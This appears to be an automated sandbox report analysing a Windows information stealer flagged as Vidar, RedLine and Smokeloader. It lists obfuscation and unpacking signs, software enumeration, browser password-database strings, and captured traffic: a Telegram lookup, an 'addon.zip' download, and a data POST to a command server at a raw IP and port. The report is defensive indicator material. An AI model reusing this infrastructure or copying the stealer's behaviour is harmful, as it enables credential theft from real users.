Source: 06625899.exe, 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000003.402473646.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000003.402473646.0000000000900000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/looking_glassbot
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/looking_glassbotC
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/looking_glassbotJ
Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----0606627400761024User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Content-Length: 143185Connection: Keep-AliveCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: t.me

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_00414330 StrCmpCA,GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

0_2_00414330

Source: global traffic	HTTP traffic detected: GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic	HTTP traffic detected: GET /667e85c8112da056f901292caf82b3ed HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303
Source: global traffic	HTTP traffic detected: GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Cache-Control: no-cache

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49684 version: TLS 1.2

Creates a DirectInput object (often for capturing keystrokes)

Source: 06625899.exe, 00000000.00000002.412477321.000000000082A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.412510711.0000000000838000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: Process Memory Space: 06625899.exe PID: 7120, type: MEMORYSTR	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown

Uses 32bit PE files

Source: 06625899.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.412510711.0000000000838000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Process Memory Space: 06625899.exe PID: 7120, type: MEMORYSTR	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23

Detected potential crypto function

Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00428C70	0_2_00428C70
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0043C00E	0_2_0043C00E
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_004051A0	0_2_004051A0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042B366	0_2_0042B366
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042A379	0_2_0042A379
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0043C55F	0_2_0043C55F
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042A80E	0_2_0042A80E
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00426810	0_2_00426810
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00426838	0_2_00426838
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0043BABD	0_2_0043BABD
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042ABAC	0_2_0042ABAC
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00405C40	0_2_00405C40
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00405C68	0_2_00405C68
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0043DC7F	0_2_0043DC7F
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00407C20	0_2_00407C20
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0043CC3B	0_2_0043CC3B
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00407C9E	0_2_00407C9E
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042CDD0	0_2_0042CDD0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00406E10	0_2_00406E10
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00426EB0	0_2_00426EB0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042AF7E	0_2_0042AF7E

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\06625899.exe	Code function: String function: 0042BD10 appears 116 times
Source: C:\Users\user\Desktop\06625899.exe	Code function: String function: 004014E0 appears 540 times
Source: C:\Users\user\Desktop\06625899.exe	Code function: String function: 00433750 appears 44 times

Source: 06625899.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 06625899.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\06625899.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\06625899.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/4@1/3

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_0041F170 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,

0_2_0041F170

Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 36067264576515806059430256.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_0041F040 CreateToolhelp32Snapshot,Process32First,Process32Next,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,Process32Next,CloseHandle,

0_2_0041F040

Source: C:\Users\user\Desktop\06625899.exe	Command line argument: The	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Greal	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: (Llangollen)	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: was	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: 19th-century	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Welsh-language	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: periodical	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: first	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: published	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: William	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Williams	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Llangollen	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: 1852	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Ebenezer	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: was	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Independent	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: chapel	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Inkerman	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Street	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Llanelli	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Carmarthenshire	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Wales	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940

Source: C:\Users\user\Desktop\06625899.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\06625899.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: 06625899.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 06625899.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 06625899.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 06625899.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 06625899.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 06625899.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 06625899.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\yukigusorefu\murebobunuxac\tuju payuxax-nus\w.pdb source: 06625899.exe
Source:	Binary string: uDC:\yukigusorefu\murebobunuxac\tuju payuxax-nus\w.pdb source: 06625899.exe

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\06625899.exe

Unpacked PE file: 0.2.06625899.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\06625899.exe

Unpacked PE file: 0.2.06625899.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042C254 pushad ; retn 0042h	0_2_0042C255
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00433795 push ecx; ret	0_2_004337A8
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042ECB5 push ecx; ret	0_2_0042ECC8

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_00424430 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00424430

Source: initial sample

Static PE information: section name: .text entropy: 7.818078308305934

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49685

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\06625899.exe

0_2_00424430

Is looking for software installed on the system

Source: C:\Users\user\Desktop\06625899.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\06625899.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_004011A0 GetSystemInfo,

0_2_004011A0

Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00424100 FindFirstFileW,_wcslen,FindNextFileW,_wcslen,FindNextFileW,	0_2_00424100
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00416500 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00416500
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_004118B0 _memset,lstrcat,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_004118B0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00416B10 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,_memset,_memset,_memset,_memset,_memset,_memset,	0_2_00416B10
